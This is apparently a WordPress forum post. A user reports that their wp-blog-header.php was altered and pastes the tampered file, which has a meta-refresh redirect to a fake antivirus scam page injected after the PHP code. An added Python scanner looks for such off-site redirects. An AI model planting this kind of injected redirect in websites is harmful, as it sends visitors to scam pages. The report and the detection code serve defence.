My 2.5.1 installation got hacked!
I don’t know if I’m the first person ever to have this happen, but something hacked into my wp-blog-header.php and altered the file to look like this:
<?php
if (! isset($wp_did_header)):
if ( !file_exists( dirname(__FILE__) . '/wp-config.php') ) {
	if (strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) $path = '';
	else $path = 'wp-admin/';

	require_once( dirname(__FILE__) . '/wp-includes/classes.php');
	require_once( dirname(__FILE__) . '/wp-includes/functions.php');
	require_once( dirname(__FILE__) . '/wp-includes/plugin.php');
	wp_die("There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='https://codex.www.ads-software.com/Editing_wp-config.php'>We got it</a>. You can create a <code>wp-config.php</code> file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file. <a href='{$path}setup-config.php' class='button'>Create a Configuration File</a>", "WordPress › Error");
}

$wp_did_header = true;

require_once( dirname(__FILE__) . '/wp-config.php');

wp();

require_once(ABSPATH . WPINC . '/template-loader.php');

endif;

?>
<meta http-equiv="Refresh" content="1; url=https://www.antivirusxp2008.com/scanner/51e7eaa47e59669de1029742c7e77ab4/5/">
So, yes, basically they added a redirection to another page, where “don’t” is spelled as “dont” and which is disguised to look like a Windows XP alert page.
I don’t know if this is related to some serious vulnerability, but I hope I did the right thing by posting this here.
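A way to check other PHP files for the same kind of tampering, as an added example that is not part of the original post: it flags any meta refresh that sits outside the PHP tags and points at a host other than the site's own. The function names, `blog.example` and `redirect.example` are hypothetical, and the sample files are constructed.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Everything between <?php and ?> (or end of file). Heuristic: short tags and
# "?>" inside string literals are not handled.
PHP_BLOCK = re.compile(r"<\?php.*?(\?>|\Z)", re.S | re.I)
META_REFRESH = re.compile(
    r"<meta\b[^>]*http-equiv\s*=\s*[\"']?refresh[\"']?[^>]*>", re.I)
REFRESH_URL = re.compile(r"url\s*=\s*[\"']?([^\"'\s>]+)", re.I)

# Constructed samples; blog.example and redirect.example are placeholders.
SAMPLE_TAMPERED = (
    "<?php\nif (!isset($wp_did_header)):\n    $wp_did_header = true;\n"
    "    require_once(dirname(__FILE__) . '/wp-config.php');\nendif;\n?>\n"
    '<meta http-equiv="Refresh" content="1; url=https://redirect.example/scanner/">'
)
SAMPLE_CLEAN = "<?php\n$wp_did_header = true;\n?>\n"


def inline_html(source):
    """Text outside PHP tags, which PHP sends to the browser verbatim."""
    return PHP_BLOCK.sub("", source).strip()


def find_injected_redirects(source, site_host):
    """Hosts of meta-refresh targets in inline HTML that are not site_host."""
    hosts = []
    for tag in META_REFRESH.finditer(inline_html(source)):
        target = REFRESH_URL.search(tag.group(0))
        host = urlparse(target.group(1)).hostname if target else None
        if host and host != site_host.lower():
            hosts.append(host)
    return hosts


def scan_tree(root, site_host):
    """Map each *.php file under root to the off-site redirect hosts it emits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = find_injected_redirects(path.read_text(errors="replace"), site_host)
        if found:
            hits[str(path)] = found
    return hits


if __name__ == "__main__":
    print(find_injected_redirects(SAMPLE_TAMPERED, "blog.example"))
```

A loader file such as wp-blog-header.php normally emits no inline HTML at all, so any non-empty `inline_html()` result for it is worth a manual look even when no redirect is matched.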